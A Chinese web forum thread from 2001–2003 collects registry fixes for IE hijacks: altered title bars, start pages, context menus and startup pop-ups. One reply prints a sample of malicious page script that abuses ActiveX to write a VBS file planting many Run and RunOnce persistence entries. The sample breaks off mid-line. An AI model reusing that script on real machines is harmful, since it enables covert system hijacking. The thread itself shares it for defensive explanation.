收藏本站腾讯微博新浪微博

经典论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

蓝色理想 最新研发动态 网站开通淘帖功能 - 蓝色理想插件 论坛内容导读一页看论坛 - 给官方提建议

论坛活动及任务 地图和邮件任务 请多用悬赏提问 热夏来袭,选一款蓝色理想的个性T恤吧!

手机上论坛,使用APP获得更好体验 急需前端攻城狮,获得内部推荐机会 论坛开通淘帖功能,收藏终于可以分类了!

搜索
查看: 26379|回复: 17

IE相关反修改集粹

[复制链接]
发表于 2001-12-19 12:04:00 | 显示全部楼层 |阅读模式
总有朋友说自己的IE出了问题,不外乎是IE被恶意修改了,这里有很多防范和反修改的技巧,和大家共享!呵呵,上帝保佑!

最近一些网页为了达到宣传的目的,利用IE的漏洞修改浏览者的注册表,肆意修改IE的首页、标题栏等内容,令人憎恶。本文按直接修改注册表和用MagicSet修改两个方法说明如何去除这些内容及防范。如果你对注册表比较熟悉,可参考本文所述的键值直接对其修改,如果对注册表不熟的话建议使用MagicSet即超级兔子魔法设置软件来改,安全且方便,本文以3.92版为例。

一、修改IE的标题栏

即在IE浏览器最上方的蓝色横条里做广告,而不是显示默认的“Microsoft Internet Explorer”。这种修改非常常见,有人也特意针对它编制了反修改的程序。

1.注册表法

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main
HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main在注册表中找到以上两处主键,将其下的“Window Title”主键删除,并关闭所有打开的IE浏览器窗口再重新打开就能看到效果。

2.MagicSet法

点击“IE 4/5”,点击与“IE 标题”字体平行的“复原”按钮即可。

二、修改IE的首页

这个改回来很方便,在IE的设置里就有。比较麻烦的是某些网页在浏览者的硬盘里写入程序,使重启计算机后首页设置又被改了回去,这时可使用“系统配置实用程序”来解决。开始—运行,键入msconfig点击“确定”,在弹出的窗口中切换到“启动”选项卡,禁用可疑程序启动项。

三、在Windows启动时显示一个窗口,点确定才能进去

这个设置其实与IE无关,而是Windows的登录提示窗口,不过最近有些网页对它动上了脑筋,在这个窗口里做广告。

1.注册表法

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon在注册表中找到此主键,将其下的“LegalNoticeCaption”和“LegalNoticeText”主键删除即可。

2.MagicSet法

点击“安全与多用户”,再点击左上角的“+”切换窗口后,清除“启动时要显示的标题”和“启动时要显示的信息”两项内容即可。

四、在IE里点击鼠标右键。在弹出的菜单里显示网页广告

这种情况很少见,我还没碰到过,不过解决方法也不复杂。

1.注册表法

HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\MenuExt在IE中显示的附加右键菜单都在这里设置,常见的网络蚂蚁和网际快车点击右键下载的信息也存放在这里,只需找到显示广告的主键条目删除即可。

2.MagicSet法

点击“IE 4/5”,再点击左上角的“+”切换窗口后,在上方的列表窗口中即可修改、删除IE的附加右键菜单项。

五、防范

1.因为修改注册表设置都是用的JavaScript脚本语言,所以只需禁用它即可。但这种脚本语言应用广泛,所以建议在IE的设置中将脚本设为“提示”。

2.建议使用一些单窗口多页面的浏览器如NetCaptor等,因为它们往往能更方便地切换脚本设置,象我常用的NetCaptor,用工具栏中的“安全”按钮能很方便地设置脚本、ActiveX和Cookie的启用情况。

3.使用IE6.0,虽然迟迟看不到这个浏览器的正式版本,而且测试版问题很多,但据用过的人说使用它浏览网页,将无法再随意修改你的注册表。

4.使用Win2000的朋友,只需在“控制面板”—“管理工具”—“服务”中禁用Remote Registry Service服务,也无法通过浏览网页来修改你的注册表了。

5.使用Norton AntiVirus 2002 v8.0杀毒软件,这个版本新增Script Blocking功能,将通过IE修改注册表的代码定义为Trojan.Offensive并予以拦截。

六、相关软件

1.MagicSet V3.92
http://www.superrsoft.com/

2.IE浏览器标题栏修改器(IETitleFixer) V1.3
http://www.soft999.com/download1/IETitleFixer13.zip
可修改IE的标题栏、主页及OE的标题栏,只是需要VB6运行库的支持。

3.IE反修改精灵 V1.52
http://www.soft999.com/download1/IESetup.exe
除了可修改IE的标题栏,还可设置为开机自动运行并使桌面图标透明。

七、快速恢复

将以下内容复制粘贴到记事本,并存为UnDoIE.reg文件,注意在保存时选“保存类型”为所有文件,这样它在保存时就不会自动加上.txt的后缀名了。

REGEDIT4

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main]
\"Window Title\"=\"Microsoft Internet Explorer\"
\"Start Page\"=\"about:blank\"

[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]
\"Window Title\"=\"Microsoft Internet Explorer\"

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon]
\"LegalNoticeCaption\"=\"\"
\"LegalNoticeText\"=\"\"

在发现上述IE相关设置被网页修改后,双击UnDoIE.reg即可将上述一、二及三项同时复原了。

评分

参与人数 1威望 +3 收起 理由
经典论坛大妈 + 3 历史打分

查看全部评分

发表于 2002-1-21 11:12:00 | 显示全部楼层
很多人都问过这样的问题,置顶几天,相信对大家能有所帮助
发表于 2002-1-22 13:20:00 | 显示全部楼层
来补充一点

三、手动清除

1. 注册表被禁用

对注册表的编辑是解决本文所涉及问题的关键所在,而许多朋友在打开注册表修编辑器时,却发现居然连注册表都被"管理员禁用"了!其实这也是含有恶意代码的网页文件捣的鬼。如果您的注册表也被禁用了,可以按下面的方法来解锁:

1.)新建一个文本文件,输入以下内容(注意保持文本格式):
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistryTools"=dword:00000000
点击"文件"菜单,选择"保存"命令,以"recover.reg"为文件名保存在任意位置。
2.)双击该"recover.reg"文件,系统弹出"是否确认要将 recover.reg 中的信息添加进注册表"的确认框,点?quot;是",随后,系统提示"recover.reg 里的信息已被成功地输入注册表",再点击"确定"即可将注册表解锁并进行随后的修改。

2. 开始菜单的"运行"消失

在"运行"栏中输入regedit是我们常用的打开注册表编辑器的方式。然而有些含恶意代码的网页甚至连这里都不放过,难道它们认为凭这就可以阻止我们对注册表的反修改吗?没问题,用两个简单的方法就可以把"运行"恢复。
其一,进入C:\WINNT(Win9X的用户为C:\WINDOWS),找到"regedit.exe",双击它就可以打开注册表编辑器,接着请定位到:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
找到"NoRun"值项,右键单击之,选择"修改"(或者直接删除更好),把它的值改为 0,重新启动电脑即可;
其二,新建一个文本文件,输入以下内容ㄗ⒁獗3治谋靖袷剑?br> REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoRun"=dword:00000000
将该文件保存为run.reg文件,双击该文件,重启电脑后,再打开"开始"菜单看看,"运行"选项是不是已经恢复了呢?

3. IE浏览器的标题栏被修改

这是目前最常见的修改IE浏览器的方式。它的反修改也很容易,首先打开"开始"菜单,选?quot;运行...... "命令,在弹出的输入框中输入"regedit",点击"确定"即打开了注册表编辑器。然后请定位到:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main 、
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 及HKEY_USERS\.DEFAULT\Control Panel
三处子项,您会发现在它们下面都有一个叫"Window Title"的值项(也可能只有一处有,关键是要修改HKCU的值项),用鼠标右键单击该值项,在弹出菜单选择"修改",将它修改为默认的"Microsoft Internet Explorer"或者任意您希望看到的语句,最后关闭注册表编辑器并打开一个新的IE浏览器窗口,就能看到您设定的效果。

4. OutLook的标题栏被修改

这个情况比较少见,至少我没有遇到过,只怯型研葱爬囱剩也胖烙行┤司尤晃蘖牡秸庵值夭健2还还叵担姆葱薷耐芗虻ィ蚩⒉岜肀嗉鳎ㄎ坏剑?br> HKEY_CURRENT_USER\Software\Microsoft\Outlook Express
子项下,找到值项"Window Title",和反修改IE浏览器的方法一样来修改"Window Title"值。最后关闭注册表编辑器并重起OutLook即可看到效果。

5. IE浏览器的首页被修改

这可能是目前网友反映最多的一个问题。一开始的时候解决这个问题很简单,在IE的菜单中选择:"工具"-->"Internet选项"-->"常规" ,在"主页"一栏中进行修改即可。但随着事态的发展,形势日趋严峻:一些网站的站长将多个脚本程序联合使用,导致的后果往往就是首页被修改的同时,IE的"主页"选项也被禁用(按钮呈灰色不可用状态)!不过,没问题,现在我们就来解决这个问题。
请您打开注册表编辑器。定位到:HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel及HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
两处子项,你会发现一个名为HomePage的DWORD值项,值为: 1 ,不必犹豫,直接删掉它,或者把值改为0。然后关闭注册表编辑器,新开一个IE浏览器,再依次点击"工具"-->"Internet选项"-->"常规",你就会发现原来呈灰色的修改IE主页的按钮已经恢复到了可编辑状态。此时您就可以按自己的喜好随意设定浏览器的主页了。


6. IE浏览器的默认页及空白页被修改

打开注册表编辑器,定位到:HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main子项,修改Default_Page_URL的值即可(原IE的默认页为http://www.microsoft.com/isapi/r ... =5.5&ar=msnhome)。
定位到:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main子项,修改Local Page的值即可。

7. 每次开机后弹出一个网页

如果您每次开机后都会弹出一个IE浏览器,那就请您记住地址栏里的网址,然后打开注册表编辑器,定位到:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
看看在该子项下是否有一个以这个网址为值的值项,如果有,删除它。下次开机时就不会再有浏览器弹出了。不过道高一尺,魔高一丈,有时候这样也未必能解决问题。遇到这种情况,您可以在注册表编辑器的菜单里选?quot;编辑"-->"查找…….",在"查找"对话框内输入开机时自动打开的网址,然后点击"查找下一个",将查找到的值项删除。另外,如果您是使用Win98的用户,请在"开始"菜单中的"运行"对话框内输入"msconfig",点击确定,打开"系统配置实用程序"并点击"启动"选项卡,检查其中是否有可疑的启动项,有点话请将其禁用(去掉程序前的勾),然后重起系统查看效果。如果您是Win2000的用户,可以copyWin98或WinXP下的"系统配置实用程序"(可以在我的主页http://www.blue-online.net/ 下载。)来查找。

8. 每次开机后弹出一个确定框

这是Windows登陆后的一个提示框,Win98的用户可以在组策略中自由定义提示框的内容。也可在注册表里编辑它。打开注册表编辑器,定位到:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon
该主键下分别有"LegalNoticeCaption"和"LegalNoticeText"两个值项。他们分别定义了该提示框的标题和正文内容。将这两个值项删除即可。


9. IE浏览器的鼠标右键被禁用

其症状即为打开任意一个网页,单击鼠标右键都无法弹出菜单选项。这给许多经常上网的朋友造成了很多不便。和上面一样,打开注册表编辑器,定位到:HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions,在该子项下有一个dword值为1的"NoBrowserContextMenu"值项,删掉它即可。

10. 右键菜单内被添加网站链接

很多朋友会在无意间突然发现,自己的右键菜单里不知道什么时候多出了一个"欢迎光临XXXXXX网站"的选项,点击之后便会打开浏览器进入这个网站。其实这往往是通过脚本程序在注册表里做了手脚。我最早遇到这种情况是在5、6年前,那时3721网站就采用了这种技术,在访问者的右键菜单加上了他们网站的快捷方式。解决的方法也很简单,定位到:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt ,仔细查看其下的子项,删除你不要的即可。当然您也可以照此格式添加自己的快捷方式,比如常去的网站等等。不过要是您对注册表不太熟悉的话,建议您先做好备份再修改。



11. 桌面上的图标全部消失

如果当您打开电脑,发现自己的桌面上居然空空如也,一个图标都不见了,您会作何感想?不用说,这十有八九又是"上网惹得祸"。如果您想恢复,请把注册表定位到:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,
找到"NoDesktop"值项,右键单击之,选择"修改"(或者干脆删除也可以),把它的值改为0,重新启动电脑即可。看看,是不是又恢复到您熟悉的桌面了^_^?

12. IE工具栏(菜单)被添加网站链接

大家都知道,我们常用的软件如Flashget、ICQ等在安装后,会向IE的工具栏(菜单)中添加它们的快捷方式。现在有些网站也通过恶意脚本修改注册表来达到同样的效果。下面就让我们来解决这个问题,请把注册表定位到:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions,您会看到在该主键下有一些形同"{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}"的子键,仔细查看一下您就会明白,这些子键就是解决问题的关键所在,现在您只需将包含恶意网站链接的那个子键删除即可。另外,如果在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\CmdMapping下有和您删除的形同{X......X}一样键值的值项,也请将它删除。完成后关闭注册表编辑器,重新打开一个IE窗口,看看工具栏(菜单)是不是已经恢复了?其实利用这个特性我们还可以DIY一个属于自己的个性工具栏,具体的做法您可以在我的网站的注册表进阶栏目中找到。


评分

参与人数 1威望 +3 收起 理由
经典论坛大妈 + 3 历史打分

查看全部评分

发表于 2002-1-22 15:54:00 | 显示全部楼层
我以前一直遇到这种问题,现在升级到了IE6.0,有时也用MSN浏览器,外加一个NORTON防火墙,至今没有遇到过(好像在做广告似的)
发表于 2002-1-23 21:39:00 | 显示全部楼层
to blueonline:
    谢谢你的补充
   
    欢迎大家多发点类似的技巧、经验、总结、集锦之类的文章,我想这一方面可以帮助别人,一方面也可以使自己学到更多的东西。对于这些热心的朋友,我们将会尽版主所能对帖子进行打分奖励 。
    最后要补充的是如果是引用的文章,请写上出处,这样做也是为了经典论坛好,避免不必要的麻烦,希望大家能理解与合作,谢谢
发表于 2002-1-26 10:04:00 | 显示全部楼层
修改注册表等很麻烦,直接下载一个IE的反修精灵不是更好?
点此下载IE反修精灵
发表于 2003-2-10 14:41:00 | 显示全部楼层

http://magic.3721.com
也可以恢复

前提是安装一下插件
发表于 2003-2-11 11:30:00 | 显示全部楼层
最近发现一种比较“强”的恶意代码,在此特意给大家说明一下:
比代码的原理是,在你的硬盘中生成一个*.dll(或其它可以掩人耳目的文件名),每次开机运行修改注册表,不知情的人在用修复工具修复注册表后就以为是万事大吉,但是每次开机后(高深一点的还会隔时间运行)又恢复“原样”.对付这种恶意代码的解决方法是:用修复工具(如MagicSet)修复注册表后,再把恶意代码所生成的文件删除,再在注册表中,把那个文件的自动运行的键值也删除。
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent.class></APPLET>");   
function SystemServices() {   
a=document.applets[0];  
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');  
a.createInstance();  
Shl=a.GetObject();  
a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');  
a.createInstance();  
fso=a.GetObject();
var wf1=fso.CreateTextFile("c:\\windows\\unstup.vbs",true);   
wf1.writeLine('Set WHl = CreateObject("WScript.Shell") ');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\system","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\internat.exe","internat.exe"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\zwupdows","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\qwe","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win1","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\mwin","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\internt","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\intenet","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Inernet","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Internet","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\iexpleror","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\zxdows","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Start Pagewin","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Start Page","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\syste","12"');
wf1.writeLine('WHl.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\my","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\SystemServices","12"');
wf1.writeLine('WHl.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\stup","12"');
wf1.writeLine('WHl.RegDelete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"');
wf1.writeLine('WHl.RegDelete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\zwupdows"');
wf1.writeLine('WHl.RegDelete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\qwe"');
wf1.writeLine('WHl.RegDelete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win"');
wf1.writeLine('WHl.RegDelete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\win1"');
wf1.writeLine('WHl.RegDelete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\mwin"');
wf1.writeLine('WHl.RegDelete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\internt"');
wf1.writeLine('WHl.RegDelete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\intenet"');
wf1.writeLine('WHl.RegDelete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\inernet"');
wf1.writeLine('WHl.RegDelete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Internet"');
wf1.writeLine('WHl.RegDelete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\iexpleror"');
wf1.writeLine('WHl.RegDelete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\zxdows"');
wf1.writeLine('WHl.RegDelete "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Start Pagewin"');
wf1.writeLine('
发表于 2003-2-11 17:44:00 | 显示全部楼层
能够预防不是更好吗?
通过设置internet选项的“安全-自定义级别”,把前四项控件禁止,文件下载禁止,这样 几乎 可以杜绝所有网页恶意代码,副作用无非是语音聊天室不能进。还有的网站听说是利用了MIME漏洞,补丁早就有了,升级到Ie6也行吧。
发表于 2003-2-13 15:31:00 | 显示全部楼层
谢谢以后可以少受一点苦了
发表于 2003-2-20 09:16:00 | 显示全部楼层
各位大侠,我的电脑首页被修改成了coolcdrom.com,到msconfig里也不知道禁用哪样,每次修改过来,重起又变回去了,帮一下
发表于 2003-2-23 16:31:00 | 显示全部楼层
bear99269在上个帖子中说
各位大侠,我的电脑首页被修改成了coolcdrom.com,到msconfig里也不知道禁用哪样,每次修改过来,重起又变回去了,帮一下

你可以把你的msconfig项目抓个图给我们看看吗?
你点下键盘上的print screen sysrq键就可以抓下,要不
用抓图软件也可以抓下图片~
这样我们有了图片也可以告诉禁用那个项目!


你还可以看看下面的这个:
经常有网友来询问,为何我的开机会弹出窗口,而我一般会答复对方,开始-运行-msconfig-启动,把网址钩掉,还有hta后缀的htm后缀的url后缀的都钩去,而有的网友会询问为何启动后本来修复好的项目又被改了,我会回复开始-运行-msconfig-启动,把关于regedit/s的钩去,不过道高1米,魔高1.1米,我们往往会漏掉什么,而把msconfig里面的启动项全部钩掉再一个个测试那是不大实际的,so,我们现在就来讲讲msconfig启动里面哪些才是默认启动的项,哪些是非法的项.

一般呢,我们都是用win98se第二版的,这个版本有七八个默认的启动项.

Welcome C:\WINDOWS\Welcome.exe /r
欢迎进入Windows程序,这个不用我说了吧,每个人第一次启动系统的时候都会有这个欢迎程序出现的,几乎没有什么用途.

TaskMonitor C:\WINDOWS\taskmon.exe
任务检测程序,这个监视器将记录你使用软件的情况,然后将这些资料保存到 windows\applog的applog.ind文件中

internat.exe internat.exe
注意哦,这里的internat很多人会误以为是网络什么有关的,其实不然,因为他和英特网internet差一字哦,这里这个internat是输入法图标的工具,一般本机只有一个输入法的都不需要运行这个.(任务栏里面的En图标)

ScanRegistry C:\WINDOWS\scanregw.exe /aotorun
注册表备份程序,每次开机都备份一次注册表,这个呢,其实我是建议大家使用,因为现在恶意代码网站太多了,如果不小心被破坏了,还可以恢复上一次的注册表.

SystemTray SysTray.Exe
管理驻留内存的程序,建议保留,这样的话,电脑用一段时间后系统会越来越慢的状况会减轻一点.

SchedulingAgent C:\WINDOWS\SYSTEM\mstask.exe
系统计划任务程序,我不解释了,一般没什么用.

LoadPowerProfile Rundll32.exe powrprof.dll,LoadCurrentPwrScheme(可能会出现两次)
电源管理程序,如果禁用掉后,在控制面版-电源管理,里面设置的就没有效果了.

以上这些就是windows一些默认启动的项目了,然后自己排除掉一些后来安装的软件,比如3721的中文网址,网络蚂蚁,多媒体键盘,鼠标之类的,一般就可以知道哪些项该去掉了吧,

发表于 2003-2-24 14:43:00 | 显示全部楼层
我使用的是win2000,没有msconfig,怎样来禁用启动项,防止主页被重新修改!!!!!!!
发表于 2003-2-25 23:29:00 | 显示全部楼层
非常感谢wscn108的指导,我受益多多!
发表于 2003-2-26 13:37:00 | 显示全部楼层
shllhs在上个帖子中说
我使用的是win2000,没有msconfig,怎样来禁用启动项,防止主页被重新修改!!!!!!!

2000里面没有msconfig这个文件,你可以从XP系统考一个到WINT/SYSTEM32
里面就可以!
如果你要的话,我发可以一个给你!
发表于 2003-2-26 15:54:00 | 显示全部楼层
谢谢你wscn108,我现在就需要!可以把他发到yunkuotianxian@sohu.com给我,再次感谢!!!
发表于 2003-3-4 10:01:00 | 显示全部楼层
提示: 作者被禁止或删除。
发表于 2003-6-1 21:04:00 | 显示全部楼层
敬业!!!!!!!!!!!
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|Archiver|手机版|blueidea.com ( 湘ICP备12001430号 )  

GMT+8, 2020-11-30 09:15 , Processed in 0.171441 second(s), 13 queries , Gzip On, Memcache On.

Powered by Discuz! X3.2 Licensed

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表